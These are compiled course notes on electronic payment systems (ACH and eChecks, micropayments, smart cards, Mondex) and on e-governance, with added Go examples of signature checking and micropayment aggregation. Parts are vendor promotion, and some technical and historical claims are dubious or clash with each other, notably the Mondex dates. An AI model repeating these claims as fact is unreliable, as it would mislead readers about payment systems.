The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster: clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately and electronically through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments, and business-to-business payments.

Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more:

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 3.6 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the eCheck, and the public key is the key given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.
3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data, and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.
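As an added example (not part of the original text or any real eCheck format), the Go program below shows the authentication property described under "Protecting your business": the payer signs the check's fields with an Ed25519 private key, and a merchant or bank holding only the public key can confirm who signed it and that no field was altered in transit. The ECheck layout, the field values and the routing and account numbers are constructed placeholders.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"errors"
	"fmt"
)

// ECheck holds the fields a payer commits to when signing an electronic
// check. Hypothetical layout for this example, not the FSTC or any bank's
// actual eCheck format.
type ECheck struct {
	CheckNo int
	Routing string // payer's bank routing number (ABA); constructed value
	Account string // payer's account number; constructed value
	Payee   string
	Cents   int
	Sig     []byte
}

// canonical is the exact byte string that gets signed. Every field that
// matters is included and delimited, so altering any of them changes the
// bytes and therefore invalidates the signature.
func (c ECheck) canonical() []byte {
	return []byte(fmt.Sprintf("echeck|%d|%s|%s|%s|%d",
		c.CheckNo, c.Routing, c.Account, c.Payee, c.Cents))
}

// Sign is the payer's step: the private key never leaves the payer and is
// used only to produce the signature over the canonical form.
func Sign(priv ed25519.PrivateKey, c ECheck) ECheck {
	c.Sig = ed25519.Sign(priv, c.canonical())
	return c
}

var ErrInvalidSig = errors.New("signature does not verify: wrong signer or altered check")

// Verify is the merchant/bank step: given only the payer's public key, it
// confirms the check was signed by the holder of the matching private key
// and that no field was modified after signing.
func Verify(pub ed25519.PublicKey, c ECheck) error {
	if !ed25519.Verify(pub, c.canonical(), c.Sig) {
		return ErrInvalidSig
	}
	return nil
}

// DemoECheck returns the verification result for the genuine check, for
// the same check with its amount raised after signing, and for the check
// presented against a different party's public key.
func DemoECheck() (genuine, tampered, wrongKey error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return err, err, err
	}
	otherPub, _, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return err, err, err
	}
	check := Sign(priv, ECheck{
		CheckNo: 1042,
		Routing: "000000000", // constructed placeholder, not a real routing number
		Account: "12345678",  // constructed placeholder
		Payee:   "Example Merchant",
		Cents:   12999,
	})
	genuine = Verify(pub, check) // nil: signed by the key holder, unmodified

	altered := check
	altered.Cents = 1299900 // amount changed in transit; signature bytes unchanged
	tampered = Verify(pub, altered) // ErrInvalidSig

	wrongKey = Verify(otherPub, check) // ErrInvalidSig: not this party's signature
	return
}

func main() {
	g, t, w := DemoECheck()
	fmt.Println("genuine:", g)
	fmt.Println("tampered amount:", t)
	fmt.Println("other party's key:", w)
}
```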

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize an electronic debit and enter the bank routing number (ABA) and account number.
2. Merchant's sales system securely transfers order information to CyberSource over the Internet.
3. CyberSource forwards the bank routing number and account number to the processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.
5. CyberSource returns the approval/decline message to the merchant.
6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System

MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples: Millicent (pre-payment/credit based), PayWord (post-payment).

MICROPAYMENT IS:

• Very small payments made over the Web
• Transactions too small for credit cards
• Can be as little as a fraction of a cent
• Alternative to subscription and advertising
• Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits for the customer in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small sums, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.
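To make the aggregation argument of the scheme and of "Advantages and risks" concrete, here is an added Go example (not from the notes): a hypothetical Broker that holds prepaid Internet wallets, accumulates per-click micropayments per seller, and settles each seller in one larger payment once a threshold is reached. The fee schedule (30 cents plus 2.9%) and the 200-view scenario are constructed figures so that charging every click separately can be compared with the aggregated model on the same stream of payments.

```go
package main

import (
	"errors"
	"fmt"
)

// Fee schedule of a conventional (macropayment) processor: a fixed fee plus
// a percentage per transaction. Constructed example figures, not any
// provider's actual pricing.
const (
	fixedFeeCents = 30
	percentFee    = 0.029
)

// macroFee is what a card-style processor would charge for one payment.
func macroFee(cents int) int {
	return fixedFeeCents + int(float64(cents)*percentFee+0.5)
}

// Broker is the third-party provider of the scheme: it holds an Internet
// wallet per user, records each per-fee click, and only moves real money
// when a seller's accumulated balance crosses the settlement threshold.
type Broker struct {
	threshold int            // cents; below this nothing is settled
	wallets   map[string]int // user -> prepaid balance in cents
	owed      map[string]int // seller -> accumulated micropayments in cents
	settled   map[string]int // seller -> number of macro settlements made
	feesPaid  int            // total macro fees incurred by the broker
}

func NewBroker(threshold int) *Broker {
	return &Broker{
		threshold: threshold,
		wallets:   make(map[string]int),
		owed:      make(map[string]int),
		settled:   make(map[string]int),
	}
}

// Load tops up a user's wallet with one macropayment (a card charge).
func (b *Broker) Load(user string, cents int) {
	b.wallets[user] += cents
	b.feesPaid += macroFee(cents)
}

// Pay records one micropayment. It fails closed if the wallet cannot cover
// it (no partial debits). Accumulated amounts are settled to the seller as a
// single larger payment once they reach the threshold.
func (b *Broker) Pay(user, seller string, cents int) error {
	if cents <= 0 {
		return errors.New("amount must be positive")
	}
	if b.wallets[user] < cents {
		return fmt.Errorf("insufficient wallet balance for %s", user)
	}
	b.wallets[user] -= cents
	b.owed[seller] += cents
	if b.owed[seller] >= b.threshold {
		b.feesPaid += macroFee(b.owed[seller])
		b.settled[seller]++
		b.owed[seller] = 0
	}
	return nil
}

// Compare runs the same stream of 2-cent content views two ways and returns
// the fees each approach incurs plus how many settlements the broker made.
// Assumed scenario: one user views 200 items at 2 cents each, alternating
// between two sellers.
func Compare() (directFees, brokeredFees, settlements int) {
	const views, priceCents = 200, 2
	for i := 0; i < views; i++ {
		directFees += macroFee(priceCents) // each 2-cent view charged on its own
	}
	b := NewBroker(100)  // settle a seller once it is owed $1.00
	b.Load("alice", 400) // one $4.00 card load covers the whole session
	for i := 0; i < views; i++ {
		seller := "news-site"
		if i%2 == 1 {
			seller = "music-site"
		}
		if err := b.Pay("alice", seller, priceCents); err != nil {
			panic(err)
		}
	}
	brokeredFees = b.feesPaid
	for _, n := range b.settled {
		settlements += n
	}
	return
}

func main() {
	d, br, s := Compare()
	fmt.Printf("direct card charges: %d cents in fees on 400 cents of content\n", d)
	fmt.Printf("brokered: %d cents in fees, %d settlements\n", br, s)
}
```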

Payment options

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

• Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.
• Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.
• Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.
• Credit card: Payment by credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and MasterCard SecureCode™).
• Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses

• Publishing
• Marketing
• Software
• Entertainment
• Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing.[2] Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

• Standard credit card-sized, with a microchip embedded on it
• Two types:
  o Memory-only chips
  o Microprocessor chips
• Can hold up to 32,000 bytes
• Newer smart cards have math co-processors
  o Perform complex encryption routines quickly
• In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards

Why Smart Cards?

• Improve the convenience and security of any transaction
• Provide tamper-proof storage of user and account identity
• Provide vital components of system security
• Protect against a full range of security threats

Advantages

• Flexibility
• Security
• Portability
• Increasing data storage capacity
• Reliability

Schematic overview of a smart card

Smart card Processing

Smart Card Applications

• Ticketless travel
  o Seoul bus system: 4M cards, 1B transactions since 1996
  o Planned: the SF Bay Area system
• Authentication, ID
• Medical records
• Ecash
• Store loyalty programs
• Personal profiles
• Government
  o Licenses
• Mall parking
• Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

• Direct transfer of electronic money between two cards
• Transfer of electronic money over the Internet or telephone networks, etc.
• Keeps transaction records
• Password protection and "lock card" functions
• Portable balance finder to check balance
• Support for multiple currencies

ADVANTAGES

CONSUMER

• Convenience
• Accessibility
• On-chip record of recent transactions
• Home load
• Internet purchases

MERCHANT

• Reliable off-line payment
• Higher security
• Low transaction cost
• Reduced cash handling

FINANCIAL INSTITUTION

• Strengthen customer relationships
• New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy?

Principles protected:

o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information

Limits for collecting personal information

o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information

o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate

o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are actually recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
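The following Go example is added here (it is not the Mondex protocol or any vendor's code) to show the two points above in code: value moves card-to-card with no bank online, and the chip keeps only a rolling log of the last 10 transactions, so once more than 10 happen before an upload the earliest ones can no longer be retrieved for audit or fraud detection. Card, Transfer and the 14-payment scenario are constructions for the example.

```go
package main

import (
	"errors"
	"fmt"
)

// Hypothetical model of a Mondex-style stored-value card: value lives only
// on the chip, transfers happen card-to-card without contacting a bank, and
// the chip keeps a rolling log of the last logCapacity transactions (the
// notes cite a rolling 10).
const logCapacity = 10

type Entry struct {
	Seq          int    // card-local sequence number
	Counterparty string // other card's ID
	Cents        int    // negative = paid out, positive = received
}

type Card struct {
	ID      string
	Balance int
	nextSeq int
	log     []Entry // at most logCapacity entries, oldest dropped first
}

var ErrInsufficient = errors.New("insufficient value on card")

func NewCard(id string, cents int) *Card {
	return &Card{ID: id, Balance: cents}
}

// record appends to the rolling log; once full, the oldest entry is
// discarded. This is the "overflow" that makes the card less than fully
// auditable: after capacity+1 transactions the first one is unrecoverable.
func (c *Card) record(other string, cents int) {
	c.nextSeq++
	if len(c.log) == logCapacity {
		c.log = c.log[1:]
	}
	c.log = append(c.log, Entry{Seq: c.nextSeq, Counterparty: other, Cents: cents})
}

// Transfer moves value from one card to another with no bank in the loop.
// The payer is debited before the payee is credited and value is conserved:
// the sum of both balances is unchanged.
func Transfer(from, to *Card, cents int) error {
	if cents <= 0 {
		return errors.New("amount must be positive")
	}
	if from.Balance < cents {
		return ErrInsufficient
	}
	from.Balance -= cents
	to.Balance += cents
	from.record(to.ID, -cents)
	to.record(from.ID, cents)
	return nil
}

// Log returns a copy of what the bank could retrieve from the chip at the
// next ATM visit or retailer upload.
func (c *Card) Log() []Entry {
	out := make([]Entry, len(c.log))
	copy(out, c.log)
	return out
}

// Scenario: a consumer card pays a retailer card 14 times before any upload.
// It returns the payer's final balance, how many transfers happened, how
// many the log still holds, and the sequence number of the oldest surviving
// entry (which shows how many were lost).
func Scenario() (balance, performed, logged, oldestSeq int) {
	consumer := NewCard("consumer-card", 2000) // 20.00 loaded at home
	retailer := NewCard("retailer-card", 0)
	for i := 0; i < 14; i++ {
		if err := Transfer(consumer, retailer, 100); err != nil {
			panic(err)
		}
		performed++
	}
	entries := consumer.Log()
	return consumer.Balance, performed, len(entries), entries[0].Seq
}

func main() {
	bal, n, kept, oldest := Scenario()
	fmt.Printf("balance %d cents after %d payments; log holds %d, oldest seq %d (%d lost)\n",
		bal, n, kept, oldest, oldest-1)
}
```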

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with treating this definition as congruent with a definition of e-governance is that there is no provision for governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state-wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been met. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

bull Agreement between Government and the Private Sector for the Provision of a Public

Good or Service by the Latter

bull Generally but not always involving

ndash Long Term Contracts

ndash User Charges andor Payments flowing between the Parties

ndash Shared Investments but Mainly Private

PREPARED BY ARUN PRATAP SINGH 46

46

ndash Risk Sharing by the Parties

bull Must be a Partnership

A public-private partnership exists when public sector agencies (federal state or local) join with

private sector entities (companies foundations academic institutions or citizens) and enter into a

business relationship to attain a commonly shared goal that also achieves objectives of the

individual partners

Why do them?

• Fiscal head room
• As a way of financing the project
• Separate policy and regulation from operations
• Make the good or service available
• Pay for performance and output
• Introduce competition, for and in the market


The Need to Set the Right Priorities:
Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project Management: Six Distinct Phases

Genesis

What's the need?

What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

EconomicFinancial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach: Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract: Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administration.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have many transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries, which hold the top three scores on the readiness index, share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each has two main government websites: one that is informative and another that is a gateway for e-government services. Citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of a country's readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services depends heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

- understanding an organization's information security requirements and the need to establish a policy and objectives for information security;
- implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
- monitoring and reviewing the performance and effectiveness of the ISMS, with continual improvement based on objective measurement.

Data security rests on a set of security requirements:

- Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.
- Authorization: the capability to grant access rights to resources; the process of verifying that someone has the right to do what she is trying to do.
- Confidentiality: the capability to prevent unauthorized access to information.
- Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
- Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.
- Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in it.

Examples of organizational and technical measures to prevent unauthorized access and processing:

- Protecting premises, equipment and system software, including input/output units
- Protecting software applications used to process personal data
- Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks
- Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data
- Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, the issue has not yet been adequately addressed: the UN 2012 Survey shows that only 20% of national portals clearly indicate the presence of security features. Europe leads, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Documented cyber attacks use techniques such as packet sniffers, probes, malware, attacks on the Internet infrastructure, denial of service, remote-to-local and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness

Continually improve its control environment

Effectively achieve legal and regulatory compliance

